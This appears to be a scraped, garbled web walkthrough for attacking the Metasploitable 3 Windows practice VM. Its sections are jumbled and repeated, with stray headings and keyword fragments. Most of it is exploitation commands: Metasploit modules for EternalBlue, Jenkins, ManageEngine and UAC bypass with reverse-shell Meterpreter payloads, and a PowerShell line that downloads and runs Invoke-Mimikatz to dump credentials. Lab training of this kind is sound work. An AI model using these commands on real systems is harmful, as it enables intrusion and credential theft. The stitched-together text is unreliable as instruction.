Metasploitable 3 Windows Walkthrough Guide
Reports and walkthroughs for this target generally follow these key phases: 1. Reconnaissance and Information Gathering
Metasploitable 3 Windows comes pre-configured with a wide range of deliberate security vulnerabilities spanning multiple categories:
Tools like the Metasploit Framework include modules designed to verify if services allow remote command execution when valid administrative credentials are provided.
This method involves the original, manual build process using the command line. It's the best way to understand how the VM is constructed. metasploitable 3 windows walkthrough
# Download Mimikatz iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1') Invoke-Mimikatz -DumpCreds
Unquoted service paths can be exploited when a service executable path contains spaces and is not enclosed in quotes. Windows will search for executables in unexpected directories, potentially allowing an attacker to place a malicious executable that gets run with SYSTEM privileges.
The Jenkins Script Console allows execution of arbitrary Groovy script on the server. Use a Groovy payload to execute a reverse shell command: Reports and walkthroughs for this target generally follow
Known Remote Code Execution (RCE) vulnerabilities . 3. Exploitation Walkthroughs Path A: SMB EternalBlue (Port 445)
msf6 > use exploit/multi/http/jenkins_script_console msf6 > set RHOSTS 192.168.1.100 msf6 > set RPORT 8585 msf6 > set TARGETURI / msf6 > set PAYLOAD linux/x64/meterpreter/reverse_tcp # if target is Windows, use windows/x64/meterpreter/reverse_tcp msf6 > exploit
msfconsole msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 > set RHOSTS 192.168.56.102 msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 > set LHOST 192.168.56.101 msf6 > exploit It's the best way to understand how the VM is constructed
msf6 > use exploit/windows/http/manageengine_desktop_central_rce msf6 exploit(windows/http/manageengine_desktop_central_rce) > set RHOST 10.0.2.6 msf6 exploit(windows/http/manageengine_desktop_central_rce) > set LHOST 10.0.2.15 msf6 exploit(windows/http/manageengine_desktop_central_rce) > set LPORT 4444 msf6 exploit(windows/http/manageengine_desktop_central_rce) > run
use exploit/windows/local/bypassuac_dotnet_profiler set SESSION exploit Use code with caution. 5. Post-Exploitation and Flag Retrieval
Perform a comprehensive scan to identify open ports and services using nmap . nmap -p- -sV -A 192.168.x.x Use code with caution. 80/443 : HTTP/HTTPS (IIS 7.5, PHP applications) 445/139 : SMB/NetBIOS (File sharing) 3389 : Remote Desktop (RDP) 5985 : Windows Remote Management (WinRM) 8080 : Apache Tomcat Part 3: Exploitation Scenarios (Walkthrough)
use exploit/windows/http/manageengine_connection_id_write Set your RHOSTS and LHOST , then run exploit to gain a shell. 3. SMB and Internal Services
Within your Meterpreter session, check your current privileges: getuid getprivs Use code with caution. Exploit Suggestion Engine
